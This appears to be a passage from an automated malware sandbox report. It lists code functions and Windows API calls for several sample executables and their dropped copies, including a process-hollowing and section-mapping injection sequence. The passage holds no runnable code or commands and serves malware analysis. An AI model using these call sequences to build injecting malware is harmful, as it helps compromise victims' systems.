            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_004021CB NtQuerySystemInformation,NtQuerySystemInformation,0_2_004021CB
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_004017DF NtMapViewOfSection,NtMapViewOfSection,0_2_004017DF
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_004015E0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004015E0
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_004015F1 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004015F1
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_004015F5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004015F5
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_004015F8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004015F8
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_00402188 NtQuerySystemInformation,NtQuerySystemInformation,0_2_00402188
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_004027A0 NtClose,0_2_004027A0
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_004021A1 NtQuerySystemInformation,NtQuerySystemInformation,0_2_004021A1
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_004021BB NtQuerySystemInformation,NtQuerySystemInformation,0_2_004021BB
            Source: C:\Users\user\AppData\Roaming\gtdiratCode function: 6_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004015D5
            Source: C:\Users\user\AppData\Roaming\gtdiratCode function: 6_2_00401603 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401603
            Source: C:\Users\user\AppData\Roaming\gtdiratCode function: 6_2_0040161A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_0040161A
            Source: C:\Users\user\AppData\Roaming\gtdiratCode function: 6_2_004026D2 NtOpenKey,6_2_004026D2
            Source: C:\Users\user\AppData\Roaming\gtdiratCode function: 6_2_00402745 NtEnumerateKey,6_2_00402745
            Source: C:\Users\user\AppData\Roaming\gtdiratCode function: 6_2_00402348 NtQuerySystemInformation,NtQuerySystemInformation,6_2_00402348
            Source: C:\Users\user\AppData\Roaming\gtdiratCode function: 6_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_0040156B
            Source: C:\Users\user\AppData\Roaming\gtdiratCode function: 6_2_00402770 NtEnumerateKey,6_2_00402770
            Source: C:\Users\user\AppData\Roaming\gtdiratCode function: 6_2_0040217B NtQuerySystemInformation,NtQuerySystemInformation,6_2_0040217B
            Source: C:\Users\user\AppData\Roaming\gtdiratCode function: 6_2_0040217D NtQuerySystemInformation,NtQuerySystemInformation,6_2_0040217D
            Source: C:\Users\user\AppData\Roaming\gtdiratCode function: 6_2_004021CB NtQuerySystemInformation,NtQuerySystemInformation,6_2_004021CB
            Source: C:\Users\user\AppData\Roaming\gtdiratCode function: 6_2_004017DF NtMapViewOfSection,NtMapViewOfSection,6_2_004017DF
            Source: C:\Users\user\AppData\Roaming\gtdiratCode function: 6_2_004015E0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004015E0
            Source: C:\Users\user\AppData\Roaming\gtdiratCode function: 6_2_004015F1 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004015F1
            Source: C:\Users\user\AppData\Roaming\gtdiratCode function: 6_2_004015F5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004015F5
            Source: C:\Users\user\AppData\Roaming\gtdiratCode function: 6_2_004015F8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004015F8
            Source: C:\Users\user\AppData\Roaming\gtdiratCode function: 6_2_00402188 NtQuerySystemInformation,NtQuerySystemInformation,6_2_00402188
            Source: C:\Users\user\AppData\Roaming\gtdiratCode function: 6_2_004027A0 NtClose,6_2_004027A0
            Source: C:\Users\user\AppData\Roaming\gtdiratCode function: 6_2_004021A1 NtQuerySystemInformation,NtQuerySystemInformation,6_2_004021A1
            Source: C:\Users\user\AppData\Roaming\gtdiratCode function: 6_2_004021BB NtQuerySystemInformation,NtQuerySystemInformation,6_2_004021BB
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_02870110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,11_2_02870110
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_02870110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,16_2_02870110
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_00403CF111_2_00403CF1
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_028F22C011_2_028F22C0
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_0287722011_2_02877220
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_0287739311_2_02877393
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_028BE37C11_2_028BE37C
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_0287B0B011_2_0287B0B0
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_028800D011_2_028800D0
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_028770E011_2_028770E0
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_028730F011_2_028730F0
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_0287B00011_2_0287B000
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_0287A02611_2_0287A026
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_0288F03011_2_0288F030
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_0289D1A411_2_0289D1A4
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_0287912011_2_02879120
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_028BE14111_2_028BE141
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_028BB69F11_2_028BB69F
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_0287A69911_2_0287A699
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_0287E6E011_2_0287E6E0
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_0287A79A11_2_0287A79A
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_0289D7F111_2_0289D7F1
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_0287C76011_2_0287C760
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_0287352011_2_02873520
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_0287752011_2_02877520
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_02877A8011_2_02877A80
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_0287CA1011_2_0287CA10
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_0287DBE011_2_0287DBE0
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_02880B0011_2_02880B00
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_02872B6011_2_02872B60
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_0287788011_2_02877880
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_028918D011_2_028918D0
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_0289E9A311_2_0289E9A3
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_0289F9B011_2_0289F9B0
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_028789D011_2_028789D0
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_028759F711_2_028759F7
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_0287A91611_2_0287A916
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_0288A93011_2_0288A930
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_028A4E9F11_2_028A4E9F
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_02878E6011_2_02878E60
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_02875DE711_2_02875DE7
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_02875DF711_2_02875DF7
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_028B2D1E11_2_028B2D1E
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0040D24012_2_0040D240
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_00419F9012_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0040C07012_2_0040C070
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0042E00312_2_0042E003
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0040803012_2_00408030
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0041016012_2_00410160
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_004C811312_2_004C8113
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_004021C012_2_004021C0
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0044237E12_2_0044237E
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_004084C012_2_004084C0
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_004344FF12_2_004344FF
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0043E5A312_2_0043E5A3
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0040A66012_2_0040A660
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0041E69012_2_0041E690
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0040674012_2_00406740
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0040275012_2_00402750
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0040A71012_2_0040A710
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0040878012_2_00408780
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0042C80412_2_0042C804
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0040688012_2_00406880
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_004349F312_2_004349F3
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_004069F312_2_004069F3
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_00402B8012_2_00402B80
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_00406B8012_2_00406B80
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0044ACFF12_2_0044ACFF
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0042CE5112_2_0042CE51
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_00434E0B12_2_00434E0B
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_00406EE012_2_00406EE0
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_00420F3012_2_00420F30
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0040505712_2_00405057
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0042F01012_2_0042F010
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_004070E012_2_004070E0
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_004391F612_2_004391F6
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0043524012_2_00435240
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_004C934312_2_004C9343
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0040544712_2_00405447
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0040545712_2_00405457
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0044950612_2_00449506
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0044B5B112_2_0044B5B1
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0043567512_2_00435675
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0040968612_2_00409686
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0040F73012_2_0040F730
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0044D7A112_2_0044D7A1
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0048192012_2_00481920
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0044D9DC12_2_0044D9DC
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_00449A7112_2_00449A71
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_00443B4012_2_00443B40
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_00409CF912_2_00409CF9
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0040DD4012_2_0040DD40
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_00427D6C12_2_00427D6C
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0040BDC012_2_0040BDC0
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_00409DFA12_2_00409DFA
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_00409F7612_2_00409F76
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0046BFE012_2_0046BFE0
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_00449FE312_2_00449FE3
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_028F22C016_2_028F22C0
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_0287722016_2_02877220
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_0287739316_2_02877393
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_028BE37C16_2_028BE37C
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_0287B0B016_2_0287B0B0
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_028800D016_2_028800D0
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_028770E016_2_028770E0
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_028730F016_2_028730F0
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_0287B00016_2_0287B000
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_0287A02616_2_0287A026
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_0288F03016_2_0288F030
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_0289D1A416_2_0289D1A4
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_0287912016_2_02879120
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_028BE14116_2_028BE141
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_028BB69F16_2_028BB69F
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_0287A69916_2_0287A699
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_0287E6E016_2_0287E6E0
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_0287A79A16_2_0287A79A
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_0289D7F116_2_0289D7F1
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_0287C76016_2_0287C760
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_0287352016_2_02873520
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_0287752016_2_02877520
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_02877A8016_2_02877A80
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_0287CA1016_2_0287CA10
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_0287DBE016_2_0287DBE0
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_02880B0016_2_02880B00
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_02872B6016_2_02872B60
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_0287788016_2_02877880
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_028918D016_2_028918D0
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_0289E9A316_2_0289E9A3
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_0289F9B016_2_0289F9B0
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_028789D016_2_028789D0
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_028759F716_2_028759F7
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_0287A91616_2_0287A916
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_0288A93016_2_0288A930
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_028A4E9F16_2_028A4E9F
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_02878E6016_2_02878E60
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_02875DE716_2_02875DE7
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_02875DF716_2_02875DF7
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_028B2D1E16_2_028B2D1E
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0042E00317_2_0042E003
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0041E69017_2_0041E690
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0040F73017_2_0040F730
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0048192017_2_00481920
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_00419F9017_2_00419F90
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0050D05017_2_0050D050
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0040505717_2_00405057
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0040C07017_2_0040C070
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0042F01017_2_0042F010
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0050D00817_2_0050D008
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0040803017_2_00408030
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0050D02817_2_0050D028
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_004070E017_2_004070E0
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0050D09017_2_0050D090
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0050D0A817_2_0050D0A8
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0041016017_2_00410160
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_004C811317_2_004C8113
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_004021C017_2_004021C0
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0040D24017_2_0040D240
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_004C934317_2_004C9343
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0044237E17_2_0044237E
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0040544717_2_00405447
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0040545717_2_00405457
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_004084C017_2_004084C0
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0050C4E017_2_0050C4E0
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_004344FF17_2_004344FF
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0044950617_2_00449506
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0043E5A317_2_0043E5A3
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0044B5B117_2_0044B5B1
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0040A66017_2_0040A660
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0040968617_2_00409686
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0040674017_2_00406740
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0040275017_2_00402750
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0040A71017_2_0040A710
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0040878017_2_00408780
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0044D7A117_2_0044D7A1
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0042C80417_2_0042C804
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0040688017_2_00406880
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0050C96017_2_0050C960
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0050C92817_2_0050C928
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0044D9DC17_2_0044D9DC
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_004069F317_2_004069F3
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0050C98817_2_0050C988
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0050C9A817_2_0050C9A8
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_00449A7117_2_00449A71
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_00443B4017_2_00443B40
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0050CB7817_2_0050CB78
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_00402B8017_2_00402B80
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_00406B8017_2_00406B80
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_00409CF917_2_00409CF9
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0044ACFF17_2_0044ACFF
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0040DD4017_2_0040DD40
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_00427D6C17_2_00427D6C
